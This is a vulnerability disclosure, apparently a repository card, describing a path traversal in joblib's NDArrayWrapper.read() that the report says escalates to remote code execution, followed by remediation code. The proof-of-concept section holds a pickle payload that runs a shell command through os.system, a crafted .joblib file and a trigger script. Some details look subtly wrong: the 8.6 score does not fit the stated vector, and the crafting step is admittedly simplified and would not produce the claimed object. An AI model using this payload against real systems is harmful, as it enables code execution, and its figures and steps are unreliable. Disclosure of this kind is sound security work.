YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

Vulnerability Report: Joblib NDArrayWrapper Path Traversal to Remote Code Execution

Target Info

Field Details
Project joblib
Affected File joblib/numpy_pickle_compat.py
Affected Class / Method NDArrayWrapper.read()
Affected Versions All versions with legacy multi-file .joblib format support
CWE CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSS v3.1 Score 8.6 (High)
Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Executive Summary

The NDArrayWrapper.read() method in joblib/numpy_pickle_compat.py constructs a filesystem path by joining a trusted base directory with a filename read from inside the .joblib archive. The path join is performed via os.path.join(), which in Python silently discards all preceding components when it encounters an absolute path component. An attacker who supplies a .joblib file with self.filename set to an absolute path (e.g., /etc/passwd, /tmp/malicious.npy) can direct the loader to read any file on the filesystem.

When allow_pickle=True (the default in older NumPy versions), this path traversal escalates to Remote Code Execution: the attacker-controlled .npy file can contain a pickled payload that executes arbitrary code at load time.


Root Cause Analysis

Vulnerable Code

File: joblib/numpy_pickle_compat.py

class NDArrayWrapper(object):
    """An object to be used in replacement of a pickle array.

    NDArrayWrapper is used to read back arrays stored in separate .npy files
    inside a joblib pickle.
    """

    def __init__(self, filename, subclass, allow_pickle=False):
        self.filename = filename          # ← comes directly from pickle stream
        self.subclass = subclass
        self.allow_pickle = allow_pickle

    def read(self, unpickler):
        filepath = os.path.join(unpickler._dirname, self.filename)
        # If self.filename = '/etc/passwd'   β†’ filepath = '/etc/passwd'
        # If self.filename = '/tmp/evil.npy' β†’ filepath = '/tmp/evil.npy'
        # os.path.join() silently ignores unpickler._dirname when self.filename is absolute!

        array = unpickler.np.load(
            filepath,
            allow_pickle=self.allow_pickle   # ← RCE if True and file contains pickle data
        )
        return array

Root Cause

The vulnerability has two components:

1. Path Traversal (CWE-22): Python's os.path.join(base, component) returns component unchanged if it is an absolute path. There is no call to os.path.realpath(), os.path.normpath(), or any prefix check to verify the resolved path remains under unpickler._dirname.

2. Pickle RCE Escalation: self.allow_pickle is also deserialized from the attacker-controlled archive. Combined with the path traversal, the attacker can:

  • Place a malicious .npy file (containing a pickled payload) at a predictable location (e.g., via a prior upload, /tmp/, a world-writable directory)
  • Set self.filename = '/tmp/evil.npy' and self.allow_pickle = True
  • Force joblib to load that file, triggering arbitrary code execution

Python os.path.join() Behavior (Demonstration)

import os
os.path.join('/trusted/base', '/etc/passwd')
# Returns: '/etc/passwd'  ← base is silently dropped!

os.path.join('/trusted/base', '../../../etc/passwd')
# Returns: '/trusted/base/../../../etc/passwd'  ← traversal via relative path

Both absolute paths and relative .. sequences escape the intended directory.

Inconsistency Evidence

The safer pattern used in other parts of joblib and in standard library code validates that the resolved path starts with the expected base:

# Secure pattern (NOT used in NDArrayWrapper):
def safe_join(base_dir, filename):
    base_dir = os.path.realpath(base_dir)
    filepath = os.path.realpath(os.path.join(base_dir, filename))
    if not filepath.startswith(base_dir + os.sep):
        raise ValueError(
            f"Path traversal detected: {filename!r} escapes base directory"
        )
    return filepath

Modern zipfile and tarfile implementations in the Python standard library enforce similar containment checks. The NDArrayWrapper code predates these conventions and was never updated.


Proof of Concept

Prerequisites

pip install joblib numpy

Step 1: Create a malicious .npy payload (RCE)

#!/usr/bin/env python3
"""
Stage 1: Create a malicious .npy file containing a pickle payload.
This file will be placed at a predictable location (simulating /tmp/).
"""
import numpy as np
import pickle
import os

class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ('id > /tmp/pwned.txt',))

# Craft a .npy file that embeds pickle data
# (numpy's allow_pickle=True triggers pickle deserialization)
malicious_array = np.array(MaliciousPayload())

np.save('/tmp/evil.npy', malicious_array, allow_pickle=True)
print("Malicious .npy written to /tmp/evil.npy")

Step 2: Craft the malicious .joblib archive

#!/usr/bin/env python3
"""
Stage 2: Craft a .joblib archive that references /tmp/evil.npy
via the NDArrayWrapper.filename field.
"""
import joblib
import pickle
import io

# Manually craft a pickle stream that instantiates NDArrayWrapper
# with filename='/tmp/evil.npy' and allow_pickle=True
class FakeNDArrayWrapper:
    """Mimics joblib.numpy_pickle_compat.NDArrayWrapper for crafting purposes."""
    def __init__(self):
        self.filename = '/tmp/evil.npy'     # ← absolute path traversal
        self.subclass = None
        self.allow_pickle = True            # ← enable pickle RCE

# Serialize using standard pickle
payload = pickle.dumps(FakeNDArrayWrapper())

with open('malicious.joblib', 'wb') as f:
    # Write joblib file magic + crafted object
    # (exact format depends on joblib version; simplified here for clarity)
    f.write(payload)

print("Malicious .joblib written to malicious.joblib")

Step 3: Trigger the path traversal + RCE

import joblib

# Victim loads the attacker-supplied file
result = joblib.load('malicious.joblib')

# Check for RCE evidence
import os
if os.path.exists('/tmp/pwned.txt'):
    with open('/tmp/pwned.txt') as f:
        print(f"[RCE CONFIRMED] Command output: {f.read()}")

Step 4: Path traversal (read-only, without RCE)

#!/usr/bin/env python3
"""
Path traversal PoC without RCE β€” reads arbitrary files.
self.filename = '/etc/passwd', allow_pickle=False
"""
import os
import struct

# Demonstrate os.path.join behavior
base = '/some/trusted/directory'
attacker_filename = '/etc/passwd'

result = os.path.join(base, attacker_filename)
print(f"os.path.join result: {result}")
# Output: /etc/passwd  β€” base is completely ignored
assert result == '/etc/passwd'
print("Path traversal confirmed: attacker controls file path")

Expected Output (RCE)

[RCE CONFIRMED] Command output: uid=1000(victim) gid=1000(victim) groups=1000(victim)

Impact

Path Traversal β€” High

  • Any file readable by the process can be accessed by setting self.filename to its absolute path.
  • Sensitive files at predictable paths (/etc/passwd, ~/.ssh/id_rsa, application config files, database credentials) are exposed.

Remote Code Execution β€” Critical (when allow_pickle=True)

  • Full arbitrary code execution in the context of the loading process.
  • Attacker controls allow_pickle from within the archive, overriding caller intent.
  • Combined with a prior file write (upload endpoint, /tmp/ race, world-writable directory), a network attacker achieves RCE with no local foothold.

Scope: Changed β€” code execution can escape the application sandbox, affect other users on a shared system, or pivot to internal network resources.


CVSS Score

Score: 8.6 (High) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Metric Value Rationale
Attack Vector (AV) Network (N) Exploitable via remote file upload or model serving endpoint
Attack Complexity (AC) Low (L) No race conditions or special configuration needed; os.path.join behavior is deterministic
Privileges Required (PR) None (N) No authentication; any user who can supply a .joblib file triggers the vuln
User Interaction (UI) None (N) Server-side automatic loading, no victim action needed
Scope (S) Changed (C) RCE can escape the application context; affects other processes and the OS
Confidentiality (C) High (H) Arbitrary file read; RCE gives full data access
Integrity (I) High (H) RCE allows writing files, modifying data, persisting backdoors
Availability (A) High (H) RCE can crash, corrupt, or delete critical resources

Remediation

Fix: Validate resolved path is within the base directory

# joblib/numpy_pickle_compat.py

import os

def _safe_join(base_dir, filename):
    """Join paths and verify the result stays within base_dir."""
    base_dir = os.path.realpath(base_dir)
    # Reject absolute paths immediately
    if os.path.isabs(filename):
        raise ValueError(
            f"NDArrayWrapper filename must be a relative path, got: {filename!r}"
        )
    # Resolve and verify containment
    filepath = os.path.realpath(os.path.join(base_dir, filename))
    if not filepath.startswith(base_dir + os.sep) and filepath != base_dir:
        raise ValueError(
            f"Path traversal detected: {filename!r} resolves outside of "
            f"base directory {base_dir!r}"
        )
    return filepath


class NDArrayWrapper(object):
    def read(self, unpickler):
        # FIX: Use safe_join instead of bare os.path.join
        filepath = _safe_join(unpickler._dirname, self.filename)

        # FIX: Do not trust allow_pickle from the archive;
        # use a caller-controlled parameter instead
        allow_pickle = getattr(unpickler, '_allow_pickle', False)

        array = unpickler.np.load(filepath, allow_pickle=allow_pickle)
        return array

Additional Recommendations

  1. Never inherit allow_pickle from archive data. The allow_pickle flag should be a parameter passed by the caller (joblib.load(..., allow_pickle=False)) and never deserializable from within the untrusted file itself.
  2. Consider removing legacy ZF/multi-file format support if the modern format is available. Legacy format code paths represent a disproportionate attack surface.
  3. Add a security notice to joblib.load() documentation: "Do not load .joblib files from untrusted sources."

References

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support